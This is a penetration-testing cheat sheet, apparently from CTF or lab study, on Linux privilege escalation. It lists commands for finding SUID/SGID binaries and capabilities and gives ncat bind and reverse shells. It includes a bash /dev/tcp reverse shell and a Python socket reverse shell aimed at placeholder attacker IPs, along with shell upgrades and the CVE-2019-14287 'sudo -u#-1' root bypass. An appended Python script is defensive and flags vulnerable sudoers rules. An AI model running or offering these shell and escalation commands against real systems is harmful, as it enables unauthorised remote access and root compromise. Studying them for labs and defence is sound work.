GTFOBins (https://gtfobins.github.io/)_________________________________________
Find SUIDs_________________________________________
How to find another user's capabilities or sudo permissions?
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user <name> -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
SGID
find / -perm /2000 -type f 2>/dev/null
Both SUID and SGID
find / -perm /6000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Shells______________________________________________
Start bind shell (on victim):
ncat -l -p PORT -e "/bin/bash -i"
Connect to bind shell (on attacker):
ncat <victim IP> PORT
Listen for reverse shell (on attacker):
ncat -l -p PORT
Start reverse shell (on victim; without an explicit port ncat defaults to 31337):
ncat -e "/bin/bash -i" <attacker IP> PORT
Upgrade shell:
python -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
Reverse Shell
bash -c "bash -i >& /dev/tcp/<tun0 IP>/4444 0>&1" - useful if you find a .sh file on the remote system
Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker IP>",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Useful site for upgrading shells:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
Enumeration & Priv Esc Scripts_______________________
LinEnum script: download a local copy of LinEnum
linPEAS script: download a copy of linPEAS
lse.sh script: download a copy of lse
Sudo Information: Usage and Vulnerability_______________
Usage:
What is the vulnerability:
Sudo vulnerability in versions < 1.8.28 - CVE-2019-14287
The issue stems from a sudoers entry of the following form:
{user name} ALL=(ALL:!root) NOPASSWD: ALL
This is meant to prevent running commands as the superuser, so sudo -u#0 will not work; however, sudo -u#-1 will.
sudo -u#-1 <command>   (-1 is the unsigned equivalent of 4294967295)
Note: only works if you have a non-root sudo permission of this form.
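Added example (not part of these notes): a small Python checker that scans sudoers text for Runas specs that rely on `!` negation, the `(ALL:!root)` pattern above, which is only safe on sudo 1.8.28 or later. The sample sudoers content is constructed for the example; the regex only handles simple single-line rules.

```python
"""Flag sudoers rules whose Runas spec uses '!' negation (CVE-2019-14287 pattern).

Added example; not code from the notes above. Such rules must be rewritten as an
explicit allow-list of non-root users, or sudo upgraded to >= 1.8.28.
"""
import re

# Constructed sample sudoers content (not a real file).
SAMPLE_SUDOERS = """\
# Defaults
Defaults env_reset
root ALL=(ALL:ALL) ALL
bob ALL=(ALL:!root) NOPASSWD: ALL
alice ALL=(www-data) /usr/bin/less
carol ALL=(ALL, !root) /bin/bash
"""

# user  host = (runas) commands   -- simple single-line rules only.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$"
)


def find_runas_negation(text):
    """Return [(user, runas_spec)] for rules whose Runas list (users or groups)
    contains a '!'-negated entry. On sudo < 1.8.28 the user part can be
    bypassed with -u#-1, so these rules are flagged for rewriting."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas")
        # Runas spec is "users" or "users:groups", each a comma-separated list.
        parts = re.split(r"[:,]", runas)
        if any(p.strip().startswith("!") for p in parts):
            findings.append((m.group("user"), runas))
    return findings


if __name__ == "__main__":
    for user, runas in find_runas_negation(SAMPLE_SUDOERS):
        print(f"{user}: Runas spec '({runas})' uses negation; rewrite as an allow-list")
```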